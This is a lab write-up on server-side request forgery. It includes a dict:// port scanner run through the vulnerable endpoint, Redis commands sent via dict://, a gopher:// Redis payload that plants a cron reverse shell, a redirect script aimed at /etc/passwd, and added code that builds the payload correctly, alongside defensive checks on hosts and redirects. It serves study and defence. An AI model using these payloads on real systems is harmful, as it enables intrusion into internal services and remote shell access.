
SSRF-lab

2022-06-25 05:15:00 Mccc_ li

SSRF (Server-Side Request Forgery)

Principle:
Many web applications offer a feature that fetches data from other servers: given a user-supplied URL, the application retrieves an image, downloads a file, reads a file's contents, and so on. If this feature is abused, the vulnerable web application can be used as a proxy to attack both remote hosts and servers on its own internal network.

As the diagram shows:
Normally the client sends the server a request containing a URL. The server first checks whether that URL is legitimate, then requests the resource named by the URL from the intranet, and finally returns the resource to the client.

If the URL supplied by a malicious user is not filtered, he can use SSRF to reach intranet resources he is not permitted to access. In other words, the client cannot reach the intranet directly, but the server can, and that is the essence of SSRF.
PHP functions that can lead to SSRF:
file_get_contents()
fsockopen()
curl_exec()

Experiment 1 (basic)

Looking at the lab's source, you can see it uses the cURL library:
curl_init — initialise a cURL session.
curl_setopt(resource $ch, int $option, mixed $value): bool
    ch: the cURL handle returned by curl_init().
    option: the CURLOPT_XXX option to set.
    value: the value to give that option.
    In the lab's code the option is CURLOPT_URL, i.e. the URL curl will fetch, and the value is the POST parameter handler, taken straight from the request.
curl_exec(resource $ch): mixed — perform the cURL session. This is the key point: the handler parameter reaches curl_exec() without any filtering, so we can make the server request any URL, with any scheme curl supports, on our behalf.
Protocols supported by curl that are useful here:

file:// reads local files
dict:// the dictionary server protocol (RFC 2229), used to look up definitions and word lists; curl sends the URL path to the server as a raw command line, which is what the Redis examples below rely on
sftp:// the SSH file transfer protocol
tftp:// the trivial file transfer protocol
ldap:// the lightweight directory access protocol
gopher:// a distributed document delivery service that lets users browse, search and retrieve information stored on different hosts; a gopher request is just a selector string followed by CRLF, so arbitrary bytes can be delivered to a TCP service (the basis of the Redis payload below)

Use file:// to read a file:
Use dict:// for a port scan:

import requests

# Lab endpoint from the original post (the address is a placeholder); handler is
# the POST parameter that ends up in CURLOPT_URL.
url = "http://123.912.114.237:80/testhook.php"
ports = range(1, 6380)          # 1..6379, so Redis on 6379 is included
for port in ports:
    # dict:// makes curl open a plain TCP connection and send a command line;
    # a bare "127.0.0.1:port" would default to http:// instead.
    target = "dict://127.0.0.1:{0}".format(port)
    try:
        r = requests.post(url, data={"handler": target}, timeout=1)
        # On an open port curl returns whatever the service replied; when the
        # connection is refused the response body is empty.
        if len(r.text) > 0:
            print("{0} port open".format(port))
    except requests.exceptions.Timeout:
        # The lab server itself hung: the inner connection was accepted but the
        # service never spoke, so the port is open but silent.
        print("{0} port open (timed out)".format(port))

Use the dict protocol to read the Redis server's information. For a path that is not a d: or m: dictionary lookup, curl sends the path to the server as a raw command line (preceded by a CLIENT line and followed by QUIT), so the INFO command reaches Redis as-is:

dict://127.0.0.1:6379/info


dict://127.0.0.1:6379/KEYS *  lists the keys stored in Redis

A reverse shell is also possible through gopher://. The payload below speaks raw Redis protocol: flushall, set a key whose value is a cron line, point dir and dbfilename at a file path with config set, then save. I have not studied Redis yet, so I am leaving the payload here to look at later:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
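The dict:// and gopher:// Redis requests above carry the Redis wire protocol (RESP): each command is an array header *N followed by N bulk strings, each prefixed with its byte length $len. Redis takes exactly $len bytes as the argument and skips two more without checking them, so a wrong length desynchronises the stream and everything after it is parsed as garbage; the hand-assembled payload above contains such a mismatch ($16 in front of the 14-byte /var/www/html/), which is a common reason a copied gopher payload only half works. The Python below is an added example, not the lab's or the post's code: it rebuilds the post's command sequence with correct lengths (using the post's own dir, dbfilename and cron values), wraps it in a gopher:// URL the way curl expects, and includes a parser, stricter than Redis itself, that flags a malformed payload. Nothing here is sent over the network.

```python
import urllib.parse


def resp_encode(args):
    """Encode one Redis command as a RESP array of bulk strings.

    Redis counts *bytes* in the $N prefixes, so each argument is encoded to
    bytes before its length is taken.
    """
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode("utf-8")
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def resp_parse(payload):
    """Parse a run of RESP arrays back into a list of commands.

    Raises ValueError when a $N prefix does not match the data that follows.
    Redis does not verify the trailing CRLF itself, so this check is stricter
    than the server; that is the point: it catches the mistake before sending.
    """
    cmds, i = [], 0
    while i < len(payload):
        if payload[i:i + 1] != b"*":
            raise ValueError("expected '*' at offset %d" % i)
        j = payload.index(b"\r\n", i)
        count, i = int(payload[i + 1:j]), j + 2
        args = []
        for _ in range(count):
            if payload[i:i + 1] != b"$":
                raise ValueError("expected '$' at offset %d" % i)
            j = payload.index(b"\r\n", i)
            length, i = int(payload[i + 1:j]), j + 2
            if payload[i + length:i + length + 2] != b"\r\n":
                raise ValueError("length %d does not match data at offset %d" % (length, i))
            args.append(payload[i:i + length])
            i += length + 2
        cmds.append(args)
    return cmds


def resp_is_valid(payload):
    """True if the payload is a well-formed sequence of RESP commands."""
    try:
        resp_parse(payload)
        return True
    except ValueError:
        return False


def gopher_redis_url(commands, host="127.0.0.1", port=6379):
    """Wrap RESP commands in a gopher:// URL for curl.

    curl treats the first character after the slash as the gopher item type
    ("_" is a dummy), percent-decodes the remainder and sends it verbatim to
    host:port, so the bytes Redis receives are exactly the RESP payload.
    """
    payload = b"".join(resp_encode(cmd) for cmd in commands)
    return "gopher://%s:%d/_%s" % (host, port, urllib.parse.quote(payload, safe=""))


# The command sequence of the post's payload, values as given there
# (dir /var/www/html/, dbfilename root, reverse shell to 127.0.0.1:45952).
CRON_LINE = "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/45952 0>&1\n\n"
POST_COMMANDS = [
    ["flushall"],
    ["set", "1", CRON_LINE],
    ["config", "set", "dir", "/var/www/html/"],
    ["config", "set", "dbfilename", "root"],
    ["save"],
]

if __name__ == "__main__":
    print(gopher_redis_url(POST_COMMANDS))
```

The same builder works for the dict:// examples in reverse: dict:// is only useful for single commands that curl can send as one line, while gopher:// carries the full multi-command RESP stream, which is why the write-to-disk chain uses gopher.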

Experiment 2 (advance1)

Looking at the source code, this level uses a regular expression to check the protocol: the submitted parameter must start with http or https.

My idea was the trick others use: a 302 redirect to get around the http/https check, i.e. host a PHP file on an external server that redirects the lab to the real target:

<?php
// attacker-hosted page: the lab's curl fetches this over http://, then follows the redirect
header("Location: file:///etc/passwd");
?>

This should bypass the check. I enabled curl's redirect following (CURLOPT_FOLLOWLOCATION), but I don't know why it didn't succeed. I'll leave this pit here and research it later.
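Two points a tester would want here. First, libcurl refuses to follow a redirect to file:// by default: FILE has been excluded from CURLOPT_REDIR_PROTOCOLS since 7.19.4, and since 7.65.2 the default redirect set is only HTTP, HTTPS, FTP and FTPS, so CURLOPT_FOLLOWLOCATION alone will not take the lab to file:///etc/passwd, which is consistent with the failure above. Second, the regex only ever sees the first URL: a redirect to http://127.0.0.1:6379/ or any other intranet http:// address is still followed, so checking the scheme of the initial URL protects nothing. The Python below is an added example (not the lab's PHP): it puts a scheme-only check beside a check that resolves the host and allows only globally routable addresses, plus a fetch loop that re-validates every redirect hop. The regex is reconstructed from the post's description, and FAKE_DNS and FAKE_WEB are constructed stand-ins so the code runs offline.

```python
import ipaddress
import re
import socket
from urllib.parse import urljoin, urlparse

# The level's check as described in the post: only the scheme prefix is tested.
# (Exact regex is an assumption; the post only says it checks for http/https.)
SCHEME_RE = re.compile(r"^https?://", re.IGNORECASE)


def weak_check(url):
    return bool(SCHEME_RE.match(url))


def strong_check(url, resolve=socket.gethostbyname):
    """Allow only http/https to a host whose resolved address is globally routable."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addr = ipaddress.ip_address(resolve(parts.hostname))
    except (socket.gaierror, ValueError):
        return False
    # is_global is False for loopback, RFC 1918, link-local, multicast, etc.
    return addr.is_global


def fetch(url, request, resolve=socket.gethostbyname, max_hops=3):
    """Follow redirects by hand so that *every* hop is re-checked.

    request(url) -> (status, location_header, body). A client that follows
    redirects on its own (curl with CURLOPT_FOLLOWLOCATION) only lets the
    application check the first URL, which is the gap the 302 trick exploits.
    """
    for _ in range(max_hops + 1):
        if not strong_check(url, resolve):
            raise ValueError("blocked: %s" % url)
        status, location, body = request(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)   # resolve relative Location headers
            continue
        return body
    raise ValueError("too many redirects")


def fetch_or_error(url, request, resolve):
    """Return the body, or the error text if the request was blocked."""
    try:
        return fetch(url, request, resolve)
    except ValueError as err:
        return str(err)


# Constructed offline stand-ins for DNS and the web (not real hosts or pages).
FAKE_DNS = {"example.com": "93.184.216.34", "evil.example": "10.0.0.5"}
FAKE_WEB = {
    "http://example.com/page": (200, None, b"hello"),
    # attacker pages like the post's redirect script
    "http://example.com/redir.php": (302, "file:///etc/passwd", b""),
    "http://example.com/redir2.php": (302, "http://127.0.0.1:6379/", b""),
}


def fake_resolve(host):
    try:
        return str(ipaddress.ip_address(host))   # literal IP: nothing to resolve
    except ValueError:
        if host in FAKE_DNS:
            return FAKE_DNS[host]
        raise socket.gaierror("unknown host %s" % host)


def fake_request(url):
    return FAKE_WEB.get(url, (404, None, b""))


if __name__ == "__main__":
    for u in ("http://127.0.0.1:6379/", "http://example.com/redir.php", "http://example.com/page"):
        print(u, weak_check(u), strong_check(u, fake_resolve), fetch_or_error(u, fake_request, fake_resolve))
```

Even this is not airtight: the name is resolved once for the check and again by the HTTP client when it connects, so a DNS rebinding attack can pass the check and then connect to an internal address. Pinning the checked IP for the actual connection (or doing the check inside the client at connect time) closes that gap.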

Detailed SSRF bypass methods: see the linked article.

I'm leaving this lab here.


Copyright notice
This article was written by [Mccc_ li]; when reposting, please include the original link. Thank you.
https://yzsam.com/2022/02/202202210520055618.html